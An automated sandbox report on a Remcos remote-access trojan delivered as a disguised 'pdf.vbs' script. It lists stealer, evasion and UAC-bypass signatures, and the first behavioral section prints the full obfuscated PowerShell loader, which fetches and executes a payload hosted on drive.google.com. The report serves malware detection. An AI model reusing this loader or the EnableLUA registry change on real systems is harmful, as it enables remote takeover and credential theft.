Malware Analysis Report

2025-04-03 14:14

Sample ID 241105-bmfs9stncq
Target 05112024_0115_EE85716273�pdf.vbs.zip
SHA256 229b7b535ad988d6608f0122024724354fb1235dcc7cf280170e0ab4155fa739
Tags
discovery remcos remotehost collection credential_access evasion rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

229b7b535ad988d6608f0122024724354fb1235dcc7cf280170e0ab4155fa739

Threat Level: Known bad

The file 05112024_0115_EE85716273�pdf.vbs.zip was found to be: Known bad.

Malicious Activity Summary

discovery remcos remotehost collection credential_access evasion rat stealer trojan

Remcos family

Remcos

UAC bypass

Detected Nirsoft tools

NirSoft WebBrowserPassView

NirSoft MailPassView

Blocklisted process makes network request

Uses browser remote debugging

Checks computer location settings

Accesses Microsoft Outlook accounts

Legitimate hosting services abused for malware hosting/C2

Network Service Discovery

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-05 01:15

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-05 01:15

Reported

2024-11-05 01:20

Platform

win7-20240903-en

Max time kernel

300s

Max time network

120s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EE85716273·pdf.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EE85716273·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hjremarginerne Pastelfarvens Electroscission Luksusgenstande #>;$problemers='Kongebonde';<#Prowled Svovlsurt Regionsplanretningsliniens Oprindeligt tankskib Pantstterens Schleichera #>; function Umaadeholdenhed($Targes){If ($host.DebuggerEnabled) {$Animatist++;}$Decimerende=$Promonarchists+$Targes.'Length' - $Animatist; for ( $Ordinres=4;$Ordinres -lt $Decimerende;$Ordinres+=5){$rallyes=$Ordinres;$Notationsformernes+=$Targes[$Ordinres];}$Notationsformernes;}function Disrespecter($Savouriest){ & ($Overassertion) ($Savouriest);}$Godmaking=Umaadeholdenhed ' Fi,MsvmmoEphazUnsei mkalAnthlS,mfaTvil/Jimm ';$Nadia=Umaadeholdenhed 'K geTAfsmlIsodsIndf1Fuld2Vest ';$Nerver='Ini [H ran.akte J cT Je,.Wep.sOmgre IndRMemoVBullIAnneC ValESlynpPaafoSejlIprotnSocit ForM ennaIllenFwoma ,evgRe.neHarmRcont]Bak : dbe: linSRoboE UndCOut UKalkrSu iIA.trTamm y arPCounr HenOrrflT ndro,okicFyldOMe llDefi=Pala$StudN UniaSnftDDekuI linAGyne ';$Godmaking+=Umaadeholdenhed 'Vvre5 Tr . Mor0Incl Ador(ExpoW Fari in nSkatd.nfao erswFo ls ol NonnNFiskTFrem A.sa1 pr0Skr . Bat0 L b;Samm EnteWKal,i drunDe i6 For4 ot;Tilh AuguxBage6Pead4Unde;to v Manlr KodvTrav:Brit1wate3Mod,1 kam.Gav,0Disp)Cha ,isiGVelfe Re,c HerkFredoTiko/Indd2Rand0.ubt1Arca0 Sm,0Teks1 Sel0Indu1Udta harpFUdkriPendr vere UnffKlaro angxh ez/Sole1Luft3T.av1,rem.Bys.0Immo ';$Sabotagen=Umaadeholdenhed 'KalkUIndhShru,E EthrPres-indiaCa og SufEPensNPaeat For ';$Gefulltefish=Umaadeholdenhed ' kruh BestKlodt Comp ives Fo.:Dile/Hjem/Aandd ,enrWhisiBr,nv Flse Bus.Cromg.iasoKo soStetg orslIncleMart. ollc Sv o.ubtmF.jl/EfteuAs.ecObse?.augeCounxPolypEbonoS lfrk ngtAkku=UrosdspisoAbasw SkanIn.alGru oNedsaSknkd art&AzotiBlepdBjer=Divi1,rmi9Brani.lleuharc6Ca p4 Evom rev- Kiwn AerlMordz Che4NyerZK,nskOuts_BizaAUnt,kUndeo AmpVGrunG UndwUnre_ResecWardzAdjoESiegW FluuTouc6Unprs W,i1Ledewmongx nti4 Agr ';$Tripl=Umaadeholdenhed 'Se.i>Best ';$Overassertion=Umaadeholdenhed 'UndeiunmaEAn hx Qua ';$Regnearter='Celebriteternes119';$dryptrringens='\Trosbekendelsers.Kas';Disrespecter (Umaadeholdenhed ' Fls$KartG adrlNonro R,dBTrava sp LR as: eorqCustuTolda vanKLgelENonaRScroi DisCTest=G.de$OphvESwi NAfmiVAdve:LaanaSpndPSta PBlacDIde aAnakt No aUndd+ S n$ DioDFkalR fjeY tfPOs eTBlearR.grRRigsIFredNLommg anseKoncNUnv sTykt ');Disrespecter (Umaadeholdenhed ' min$P,lmGPhytLKildoHeksB dipASprelSa d:InfiTHoloU SynRBrasTLo.eLGnu ECondD Rox=be a$ CoegSabeE JuvFStvnU KrllK.rklmatrTSt.lEImitf no,iSkobSReseHLem..Gaagshy ePAlliLEntrICophTC mm( en$ScotTTragr Da iF ltP,skrlOpa )Nont ');Disrespecter (Umaadeholdenhed $Nerver);$Gefulltefish=$turtled[0];$Spisevogns=(Umaadeholdenhed ' Tok$StregInteLRashOParobbindaPapilrewa:For,hShesIAnguSMo,otCeyloBogcnSoubE qui=.pryN olieMatrWSpro-K,pko TribDetejDataEUnsuC tatDhun FysiSNov YMadasKaoltGaouEB,llM .in.Pik.NNonpeCarrTTaar.JgerWNykueQuodbLigecWashL dsaiTautEUnl n andtDi.s ');Disrespecter ($Spisevogns);Disrespecter (Umaadeholdenhed 'Lumi$sci hForaiBa os ProtGsteoUnivn traeNon .AggrH amseStbeaAci dM dkeBugtrSubds bre[Unpe$U sySi daaJvnfbGlyco UdktLieba .ergSkumebar npama]Flyd= U.i$ErgoGTan oBilldAmorm laaMi ikChoniTi bn nngHale ');$Incomprehended=Umaadeholdenhed 'Serp$ ernhBehaiNonds Re tUndeoSlovnForhe Str.CrisD MagoClonwB,rwnRusll KviostejaNatudPulsFFo miVacalMarceCowo(A to$W,doG SveetilsfHenvu inhlundelForttK aleKredf CroiXenosOc eh Dis,B,er$ ineRTndeeSkmteSa,nn B ulSkraiP.alsAlfat K.uiAfhjn antgStvr) ,ic ';$Reenlisting=$quakeric;Disrespecter (Umaadeholdenhed ' Squ$FrucG KyslUn.eOHundBNonaAForkLUnte:Photqb.inUJoinEInteM UdlAgranDSm doFors=Alve(ElekTEctreUrimsPar t f r-Ko tpOrdraOb iT Fa Hr of Prim$HoejRLe iEMedde S.iNBlokLOffeIDidoSPrfaTHymnIMaanNMajeGObdu)Suba ');while (!$quemado) {Disrespecter (Umaadeholdenhed 'Slut$Hemog,esmlMello MurbSlagaR ddlSter:SupeFTri,nOveruTwopgdebufTol,r Ocei Oute.men= Fje$PeritSmrrrHkleuConteEmpi ') ;Disrespecter $Incomprehended;Disrespecter (Umaadeholdenhed 'Svans TkkTvidea CloR ndutStil-KlipsCop lInosE emoeMongPPseu Refo4Spnd ');Disrespecter (Umaadeholdenhed 'Amph$EpheGPalml U voGennBDynaAOv.rl Sej: recqTestUBelrEt faMRingA Aphd oplOPoli= Unc(LightOff ERe eSDi itMona-AkkopAnimaNonfTTirrH Kin Al e$Nic.rMi rerovfeSigtnM jklanglIC ntSSkaftopreIOccunOr gGLino)Sig. ') ;Disrespecter (Umaadeholdenhed 'Soja$Tu ig,andLP edo MamBHockADatalFavn:OpfiRsyntES ifLG.rmaTa,kXOd eAKnstnMer t Ter=Kach$ asiG leuLUd aOUn ebMi,lAPreaLBai.:UnreP ExqrPolieT.irc,lloIRu.dRfalscSmaguSpecl EpiAA,chTKva eB.eg+ red+Resp%Cont$BalsTDis,U GodrF nat Intl co,E Oz DFre . Pi,C ompO etcUMininFestT,ksa ') ;$Gefulltefish=$turtled[$Relaxant];}$Fensmark=316424;$Raptusernes158=29872;Disrespecter (Umaadeholdenhed ' vru$ ShogStryLUrproSeclBZ.omaWileLFr a: Ca,nIgnaOUnfiNAppliPlanNFallT oneSammrBes,p UnhRKostEChamTBlomaEmbabCirkI.ampLInviiPladtSp lY Deb Samm=.col SquaG antEForfTC ga- LufcShoao TetnHjreTRegnENephnDacaTSwin Napo$Un xrpianEBli,EfilinHis L ideiCrumsTilbTbedyIHr sNBal,gDisk ');Disrespecter (Umaadeholdenhed ' Afh$MansgAtrolKar,oCostbSc ea ManlH er:Str OOxeapReprbA faeOutcvAnc aPacerTrkaiPennn blugGenesRat,sGreetta,meMal dSuggsFogg Non= Sel Vels[ FlaSTomoyVitrs raft nsieChurmDi.t.Ort CS uio podn angvJeaneAvler B.dt lec]Titi:Akts:In,pF emirRundoMagim ,duB Ud.aForms CoueUldt6Ecch4 UndSshiktAdulr FotiOutbnCancgCaro(Komm$ simN EksoRecanGenbiRygen.kvhtFil,eRrfrr SejpI dfrSpireTilktNotaaCornbKom,iPurilCykeiVorttBaigymedi)i.dt ');Disrespecter (Umaadeholdenhed ' nst$ tregPrinlBloko FinbCameAHandlPa k:TweeL De E GylvSupreTrykVDa te,andJAntie EufSBes. Tryk=D.fe eta[,avisS raYFal SUnabTMo oeOplomStro. RadTForsE Pl xB,lltduod.Imp eBanjnMus CInteo gladSteeIEtf.N .orGkr s]Ulff: Roc:RenvAAfspsfermC SkoiTilii C y.DestGBifoeChootSn.ts HeltGermRCithIGubeNNedsgAjax( Bde$MilloFletPFre,bAccoe,ltfvO dtAIn.er Su,I FarnGramg nomSGivesm,vetHe aeBed DLoneSF,em) emi ');Disrespecter (Umaadeholdenhed 'Ikeb$Lej GRgerlAtmooNonmbAmarAJensL Inv:Hamil R,tAOverSAkkoESociR SkoPBundRDaydiVestnspecT UnseSpalROutsDtalvEPr afTherI TogNOv rI regTSuprI BinOWoodnc rds U l=Rigs$ NatL OutEM trvBurle P cVGurnET anJ GolENormSsubj.R ngSDiplUVensb,olsSWildt coorRegiIHollNU,trg Dr (Evac$SenefFonteGoveN D ms chrmXystaSta r LevK imm, Kom$A,toRRecoaEi,ePTetrt onsu oorsBro EBaanr DagnSkolE BorsDobb1Sand5Ypp 8Damp)Unde ');Disrespecter $Laserprinterdefinitions;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\Cab56C9.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2744-20-0x000007FEF665E000-0x000007FEF665F000-memory.dmp

memory/2744-21-0x000000001B670000-0x000000001B952000-memory.dmp

memory/2744-22-0x0000000001E10000-0x0000000001E18000-memory.dmp

memory/2744-23-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

memory/2744-24-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

memory/2744-25-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

memory/2744-26-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

memory/2744-27-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

memory/2744-28-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

memory/2744-29-0x000007FEF665E000-0x000007FEF665F000-memory.dmp

memory/2744-30-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

memory/2744-31-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

memory/2744-32-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-05 01:15

Reported

2024-11-05 01:20

Platform

win10v2004-20241007-en

Max time kernel

299s

Max time network

278s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EE85716273·pdf.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5080 set thread context of 4352 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5080 set thread context of 2432 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5080 set thread context of 3300 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4236 wrote to memory of 1396 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4236 wrote to memory of 1396 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3824 wrote to memory of 5080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 3824 wrote to memory of 5080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 3824 wrote to memory of 5080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 3824 wrote to memory of 5080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 5080 wrote to memory of 1004 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 5080 wrote to memory of 1004 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 5080 wrote to memory of 1004 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 1004 wrote to memory of 4028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1004 wrote to memory of 4028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1004 wrote to memory of 4028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5080 wrote to memory of 4772 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5080 wrote to memory of 4772 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 2380 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 2380 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
